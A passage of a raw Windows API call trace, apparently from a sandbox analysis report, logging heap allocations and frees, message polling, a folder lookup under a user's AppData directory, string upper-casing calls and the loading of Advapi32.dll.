(HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e18 [0156.333] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa540 [0156.333] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72b28 [0156.333] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa540 | out: hHeap=0x2af0000) returned 1 [0156.333] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c38 [0156.333] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5d0 [0156.333] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7c8 [0156.333] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72b58 [0156.333] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7b0 | out: hHeap=0x2af0000) returned 1 [0156.333] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7b0 [0156.333] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa810 [0156.333] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a73068 [0156.333] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7f8 [0156.333] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73068 | out: hHeap=0x2af0000) returned 1 [0156.333] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7f8 | out: hHeap=0x2af0000) returned 1 [0156.333] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa810 | out: hHeap=0x2af0000) returned 1 [0156.333] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7b0 | out: hHeap=0x2af0000) returned 1 [0156.333] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b58 | out: hHeap=0x2af0000) returned 1 [0156.333] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6c0 | out: hHeap=0x2af0000) returned 1 [0156.333] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72aa8 | out: hHeap=0x2af0000) returned 1 [0156.333] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7c8 | out: hHeap=0x2af0000) returned 1 [0156.333] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7b0 [0156.334] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6c0 [0156.334] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72b58 [0156.334] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77ad0 [0156.334] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7c8 [0156.334] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72aa8 [0156.334] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7c8 | out: hHeap=0x2af0000) returned 1 [0156.334] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77be8 [0156.334] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7c8 [0156.334] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa810 [0156.334] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a730a8 [0156.334] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7b0 | out: hHeap=0x2af0000) returned 1 [0156.334] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a730a8 | out: hHeap=0x2af0000) returned 1 [0156.334] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6c0 | out: hHeap=0x2af0000) returned 1 [0156.334] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b58 | out: hHeap=0x2af0000) returned 1 [0156.334] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa810 | out: hHeap=0x2af0000) returned 1 [0156.334] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77b98 | out: hHeap=0x2af0000) returned 1 [0156.334] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a58 | out: hHeap=0x2af0000) returned 1 [0156.334] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0156.334] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6c0 [0156.334] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72b58 [0156.334] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6c0 | out: hHeap=0x2af0000) returned 1 [0156.334] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c10 [0156.334] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6c0 [0156.334] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7b0 [0156.334] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72a58 [0156.334] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b48 [0156.334] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7f8 [0156.334] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a73128 [0156.335] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7f8 | out: hHeap=0x2af0000) returned 1 [0156.335] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c88 [0156.335] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7f8 [0156.335] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa810 [0156.335] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77c10 | out: hHeap=0x2af0000) returned 1 [0156.335] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b58 | out: hHeap=0x2af0000) returned 1 [0156.335] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6c0 | out: hHeap=0x2af0000) returned 1 [0156.335] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0156.335] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa540 [0156.335] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72b58 [0156.335] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa540 | out: hHeap=0x2af0000) returned 1 [0156.335] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e40 [0156.335] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6c0 [0156.335] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa540 [0156.335] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a73068 [0156.335] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e68 [0156.335] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa558 [0156.335] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a730a8 [0156.335] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa558 | out: hHeap=0x2af0000) returned 1 [0156.335] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c60 [0156.335] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa558 [0156.335] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa570 [0156.335] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a730c8 [0156.336] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6c0 | out: hHeap=0x2af0000) returned 1 [0156.336] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6c0 [0156.336] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa38 [0156.336] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a73118 [0156.336] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa50 [0156.336] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73118 | out: hHeap=0x2af0000) returned 1 [0156.336] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy/AppData/Local/ConnectedDevicesPlatform", lpFindFileData=0x8cf170 | out: lpFindFileData=0x8cf170*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc58b9bba, ftCreationTime.dwHighDateTime=0x1d32743, ftLastAccessTime.dwLowDateTime=0xc58b9bba, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0xc58b9bba, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ConnectedDevicesPlatform", cAlternateFileName="CONNEC~1")) returned 0x9e2238 [0156.336] FindClose (in: hFindFile=0x9e2238 | out: hFindFile=0x9e2238) returned 1 [0156.336] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa50 | out: hHeap=0x2af0000) returned 1 [0156.336] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa38 | out: hHeap=0x2af0000) returned 1 [0156.336] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6c0 | out: hHeap=0x2af0000) returned 1 [0156.336] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a730c8 | out: hHeap=0x2af0000) returned 1 [0156.336] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa540 | out: hHeap=0x2af0000) returned 1 [0156.336] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73068 | out: hHeap=0x2af0000) returned 1 [0156.336] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa570 | out: hHeap=0x2af0000) returned 1 [0156.336] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e40 | out: hHeap=0x2af0000) returned 1 [0156.336] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b58 | out: hHeap=0x2af0000) returned 1 [0156.336] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0156.336] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa540 [0156.337] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72b58 [0156.337] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa540 | out: hHeap=0x2af0000) returned 1 [0156.337] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77a80 [0156.337] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa540 [0156.337] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa570 [0156.337] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a73068 [0156.337] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c10 [0156.337] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6c0 [0156.337] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a730c8 [0156.337] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6c0 | out: hHeap=0x2af0000) returned 1 [0156.337] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77aa8 [0156.337] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6c0 [0156.337] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa900 [0156.337] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a73118 [0156.337] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa540 | out: hHeap=0x2af0000) returned 1 [0156.337] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa540 [0156.337] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaac8 [0156.337] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71718 [0156.337] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa840 [0156.337] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71718 | out: hHeap=0x2af0000) returned 1 [0156.337] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa840 | out: hHeap=0x2af0000) returned 1 [0156.337] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaac8 | out: hHeap=0x2af0000) returned 1 [0156.337] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa540 | out: hHeap=0x2af0000) returned 1 [0156.337] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73118 | out: hHeap=0x2af0000) returned 1 [0156.337] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa570 | out: hHeap=0x2af0000) returned 1 [0156.337] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73068 | out: hHeap=0x2af0000) returned 1 [0156.338] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa900 | out: hHeap=0x2af0000) returned 1 [0156.338] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77a80 | out: hHeap=0x2af0000) returned 1 [0156.338] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b58 | out: hHeap=0x2af0000) returned 1 [0156.338] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0156.338] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77eb8 [0156.338] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72b58 [0156.338] CharUpperBuffW (in: lpsz="A1100103809", cchLength=0xb | out: lpsz="A1100103809") returned 0xb [0156.338] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77eb8 | out: hHeap=0x2af0000) returned 1 [0156.338] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b58 | out: hHeap=0x2af0000) returned 1 [0156.338] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa9c0 [0156.338] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5de88 [0156.338] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0156.338] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72b58 [0156.338] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a73118 [0156.338] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa38 [0156.338] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaab0 [0156.338] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a73068 [0156.338] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa8b8 [0156.338] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73068 | out: hHeap=0x2af0000) returned 1 [0156.338] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a73068 [0156.338] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b98 [0156.338] CharUpperBuffW (in: lpsz="SSA1100103809", cchLength=0xd | out: lpsz="SSA1100103809") returned 0xd [0156.338] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77b98 | out: hHeap=0x2af0000) returned 1 [0156.338] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73068 | out: hHeap=0x2af0000) returned 1 [0156.338] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8b8 | out: hHeap=0x2af0000) returned 1 [0156.339] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaab0 | out: hHeap=0x2af0000) returned 1 [0156.339] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa38 | out: hHeap=0x2af0000) returned 1 [0156.339] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73118 | out: hHeap=0x2af0000) returned 1 [0156.339] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b58 | out: hHeap=0x2af0000) returned 1 [0156.339] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ed00 [0156.339] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0156.339] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ed00 | out: hHeap=0x2af0000) returned 1 [0156.339] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0156.339] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72b58 [0156.339] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77a80 [0156.339] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a73068 [0156.391] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0156.391] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77a80 | out: hHeap=0x2af0000) returned 1 [0156.391] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73068 | out: hHeap=0x2af0000) returned 1 [0156.391] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaaa80 [0156.391] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5dfa8 [0156.391] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0156.391] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a73068 [0156.391] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a73118 [0156.391] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaab28 [0156.391] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9a8 [0156.391] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a716e8 [0156.391] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa858 [0156.391] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a716e8 | out: hHeap=0x2af0000) returned 1 [0156.391] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a716e8 [0156.392] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77eb8 [0156.392] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0156.392] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77eb8 | out: hHeap=0x2af0000) returned 1 [0156.392] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a716e8 | out: hHeap=0x2af0000) returned 1 [0156.392] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa858 | out: hHeap=0x2af0000) returned 1 [0156.392] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9a8 | out: hHeap=0x2af0000) returned 1 [0156.392] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaab28 | out: hHeap=0x2af0000) returned 1 [0156.392] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73118 | out: hHeap=0x2af0000) returned 1 [0156.392] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73068 | out: hHeap=0x2af0000) returned 1 [0156.392] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ecc0 [0156.393] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0156.393] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ecc0 | out: hHeap=0x2af0000) returned 1 [0156.393] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0156.393] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a73068 [0156.393] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a73118 [0156.393] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9a8 [0156.393] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaab0 [0156.393] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a715e8 [0156.393] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa960 [0156.393] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a715e8 | out: hHeap=0x2af0000) returned 1 [0156.393] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa960 | out: hHeap=0x2af0000) returned 1 [0156.393] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaab0 | out: hHeap=0x2af0000) returned 1 [0156.393] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9a8 | out: hHeap=0x2af0000) returned 1 [0156.393] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73118 | out: hHeap=0x2af0000) returned 1 [0156.393] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73068 | out: hHeap=0x2af0000) returned 1 [0156.393] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0156.393] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa80 | out: hHeap=0x2af0000) returned 1 [0156.393] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73118 | out: hHeap=0x2af0000) returned 1 [0156.393] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9d8 | out: hHeap=0x2af0000) returned 1 [0156.393] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8d0 | out: hHeap=0x2af0000) returned 1 [0156.393] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa978 | out: hHeap=0x2af0000) returned 1 [0156.393] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6f40 | out: hHeap=0x2af0000) returned 1 [0156.393] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73068 | out: hHeap=0x2af0000) returned 1 [0156.393] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b58 | out: hHeap=0x2af0000) returned 1 [0156.393] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0156.394] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa948 | out: hHeap=0x2af0000) returned 1 [0156.394] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaab10 | out: hHeap=0x2af0000) returned 1 [0156.394] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaab28 | out: hHeap=0x2af0000) returned 1 [0156.394] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a716e8 | out: hHeap=0x2af0000) returned 1 [0156.394] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x76390000 [0156.394] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa38 | out: hHeap=0x2af0000) returned 1 [0156.394] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaab28 | out: hHeap=0x2af0000) returned 1 [0156.394] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9d8 | out: hHeap=0x2af0000) returned 1 [0156.394] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a715e8 | out: hHeap=0x2af0000) returned 1 [0156.394] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8d0 | out: hHeap=0x2af0000) returned 1 [0156.394] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73068 | out: hHeap=0x2af0000) returned 1 [0156.394] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaac8 | out: hHeap=0x2af0000) returned 1 [0156.394] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77cd8 | out: hHeap=0x2af0000) returned 1 [0156.394] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b58 | out: hHeap=0x2af0000) returned 1 [0156.394] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0156.394] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b58 | out: hHeap=0x2af0000) returned 1 [0156.394] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0156.394] CharUpperBuffW (in: lpsz="A4E00B02826", cchLength=0xb | out: lpsz="A4E00B02826") returned 0xb [0156.394] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77eb8 | out: hHeap=0x2af0000) returned 1 [0156.394] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b58 | out: hHeap=0x2af0000) returned 1 [0156.394] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73068 | out: hHeap=0x2af0000) returned 1 [0156.394] HeapFree (in: hHeap=0x2af0000, 